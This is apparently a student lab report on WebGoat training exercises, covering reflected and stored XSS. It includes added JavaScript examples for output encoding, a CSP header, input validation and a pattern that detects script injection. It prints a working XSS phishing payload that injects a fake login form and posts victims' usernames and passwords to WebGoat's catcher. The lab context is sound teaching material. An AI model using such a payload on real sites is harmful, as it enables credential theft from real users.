1. Preparation before the practice: WebGoat
WebGoat comes in a simple version and a developer version. The simple version is a single Java jar, so only a Java runtime is needed; WebGoat is started from the command line with java -jar webgoat-container-7.0.1-war-exec.jar:
WebGoat listens on port 8080, so entering http://localhost:8080/WebGoat in the browser opens the login screen.
Because I use 7.1, there is a default account; in 8.0 you can apply for an account here.
Practice content: Cross-site Scripting (XSS): 1. Phishing with XSS
The lesson is that a web page with a known XSS vulnerability can be turned into a support for phishing attacks.
The following is an example of a standard search feature.
Using XSS and HTML insertion, your goal is to:
Insert HTML that requests credentials
Add JavaScript that actually collects the credentials
Post the credentials to http://localhost:8080/WebGoat/catcher?PROPERTY=yes...
To pass this lesson, the credentials must be posted to the catcher servlet.
The XSS attack code is entered in the search box; because the search term is reflected into the page, XSS can be used to add further elements to the existing page. We first create a form for the victim to fill in a user name and password, then add a piece of JavaScript that reads the username and password the victim entered and sends them to http://localhost:8080/WebGoat/catcher?PROPERTY=yes... The full XSS attack code is as follows:
  </form>
  <script>
  function hack(){
    XSSImage=new Image;
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
    alert("Your information was stolen by 5215! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
  }
  </script>
  <form name="phish">
  <br><br><HR>
  <H2>please input your information here:</H2><br><br>
  Enter Username:<br>
  <input type="text" name="user"><br>
  Enter Password:<br>
  <input type="password" name="pass"><br>
  <input type="submit" name="login" value="login" onclick="hack()">
  </form><br><br><HR>
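The payload above only works because the search page writes the search term into its HTML unescaped. The JavaScript below is an added example, not code from the WebGoat lesson or from this report: a small model of a reflected search page in its vulnerable and its hardened form, with a shortened, constructed version of the lesson's input as the test case. The page templates, the containsActiveContent check and the CSP value are assumptions chosen for illustration.

```javascript
// Added example: a reflected search page modelled on the lesson (constructed,
// not WebGoat's real template). The vulnerable variant concatenates the search
// term into HTML; the hardened variant encodes it first.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a value for HTML element content or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: the term lands in an attribute and in element content untouched,
// so "</form><script>..." closes the real form and starts a script element.
function renderSearchVulnerable(term) {
  return '<form name="search">Search: <input name="q" value="' + term + '"></form>' +
         '<p>Results for: ' + term + '</p>';
}

// Hardened: same page, but the term passes through escapeHtml at output time.
function renderSearchHardened(term) {
  const safe = escapeHtml(term);
  return '<form name="search">Search: <input name="q" value="' + safe + '"></form>' +
         '<p>Results for: ' + safe + '</p>';
}

// Shortened version of the lesson's input, constructed for this example: close
// the site's form, add a script, then open a fake login form.
const PHISHING_INPUT = '</form><script>hack()</script><form name="phish">' +
  '<input name="user"><input type="submit" onclick="hack()"></form>';

// Conservative check over rendered HTML: a script element, an inline event
// handler with a quoted value, or a javascript: URL. The first two patterns
// cannot match encoded text, because "<" has become "&lt;" and the quote after
// "onclick=" has become "&quot;"; the javascript: pattern is a coarse flag and
// may fire on plain prose that merely mentions it.
function containsActiveContent(html) {
  return /<script\b|\son[a-z]+\s*=\s*["']|javascript:/i.test(html);
}

// How many <form> start tags the browser would see: the vulnerable page grows a
// second form (and a third, because the term is reflected twice).
function countForms(html) {
  return (html.match(/<form\b/gi) || []).length;
}

// Second layer, independent of encoding: a Content-Security-Policy that allows
// scripts only from the site's own origin. Inline <script> elements and inline
// event handlers such as onclick are then blocked even where encoding is missed.
// (Response header value assumed here for illustration.)
const CSP_HEADER = "default-src 'self'; script-src 'self'";

function demo() {
  return {
    vulnerable: containsActiveContent(renderSearchVulnerable(PHISHING_INPUT)), // true
    hardened: containsActiveContent(renderSearchHardened(PHISHING_INPUT)),     // false
    csp: CSP_HEADER,
  };
}
```

Run demo() in Node to see the two outcomes side by side. The design point is that encoding is applied at the moment the value is written into HTML, for the context it is written into (attribute value versus element content), and that the CSP header is a second, independent layer rather than a replacement for encoding.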
2.Stored XSS Attacks
The introduction to this exercise reads:
It is always a good practice to clean up all the inputs, especially those that will be used later as OS commands, scripts, and database query parameters. This is especially important for content that is permanently stored somewhere in the application. Users should not be able to create message content that could cause other users to load unwanted pages or unwanted content when retrieving user messages.
Stored XSS attack: the XSS attack code is saved in the database and executed every time a user opens the page, which makes it particularly harmful. A typical case is a message board: every time a user views the stored messages, the code is triggered, causing an unexpected page or unwanted content to be loaded when the user accesses it.
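The stored case differs from the reflected one in that the payload is written to the database once and executed on every later read, so the defence has two parts: validate what is accepted on the write path, and encode on every read. The JavaScript below is an added example, not the WebGoat lesson's or this report's code: a minimal message board with an in-memory array standing in for the database table. The field limits, the validation rules and the findSuspiciousMessages scan are assumptions chosen for illustration.

```javascript
// Added example: a message board modelled on the Stored XSS lesson (constructed,
// not WebGoat's code). Messages are kept in memory in place of a database.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

const MAX_TITLE = 60;   // assumed limits for this example
const MAX_BODY = 2000;

// Write path: reject what a message board has no reason to accept (markup in
// titles, control characters, oversize or empty fields). This is a check on
// shape, not an attempt to "clean" attack strings out of the text; the body may
// legitimately mention HTML, so it is stored as-is and encoded on output.
function validateMessage(title, body) {
  const errors = [];
  if (typeof title !== 'string' || title.trim().length === 0) errors.push('title required');
  else if (title.length > MAX_TITLE) errors.push('title too long');
  if (typeof body !== 'string' || body.trim().length === 0) errors.push('body required');
  else if (body.length > MAX_BODY) errors.push('body too long');
  if (typeof title === 'string' && /[<>]/.test(title)) errors.push('title may not contain < or >');
  if (typeof body === 'string' && /[\u0000-\u0008\u000B\u000C\u000E-\u001F]/.test(body)) {
    errors.push('body contains control characters');
  }
  return errors;
}

// In-memory store standing in for the database table.
function createBoard() {
  return { messages: [] };
}

function postMessage(board, author, title, body) {
  const errors = validateMessage(title, body);
  if (errors.length) return { ok: false, errors };
  // Store the raw text. Encoding happens at read time, because the same message
  // may later be rendered into HTML, JSON or a plain-text email.
  const id = board.messages.length + 1;
  board.messages.push({ id, author: String(author), title, body, postedAt: new Date().toISOString() });
  return { ok: true, id };
}

// Read path: every stored field is encoded for the HTML context it lands in.
function renderMessage(msg) {
  return `<div class="message" data-id="${msg.id}">` +
    `<h3>${escapeHtml(msg.title)}</h3>` +
    `<p class="meta">by ${escapeHtml(msg.author)}</p>` +
    `<pre>${escapeHtml(msg.body)}</pre>` +
    `</div>`;
}

function renderBoard(board) {
  return board.messages.map(renderMessage).join('\n');
}

// Retrospective check for a board whose read path used to skip encoding: list
// the ids of messages whose title or body carries a script element, a quoted
// inline event handler or a javascript: URL, so they can be reviewed.
function findSuspiciousMessages(board) {
  const re = /<script\b|\son[a-z]+\s*=\s*["']|javascript:/i;
  return board.messages.filter((m) => re.test(m.body) || re.test(m.title)).map((m) => m.id);
}
```

A message whose body is a script element is accepted by validateMessage (the body rule deliberately does not ban angle brackets), is stored verbatim, and renders as visible text because renderMessage encodes it; findSuspiciousMessages still reports it, which is the check to run over an existing table after a read path has been fixed.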
2. Answer questions after the experiment
(1) The principle of SQL injection attacks and how to defend against them
(2) The principle of XSS attacks and how to defend against them
(3) The principle of CSRF attacks and how to defend against them
3. Experiment Summary and experience
Network countermeasure technology 2017-2018-2 20155215 EXP9 Web Security Foundation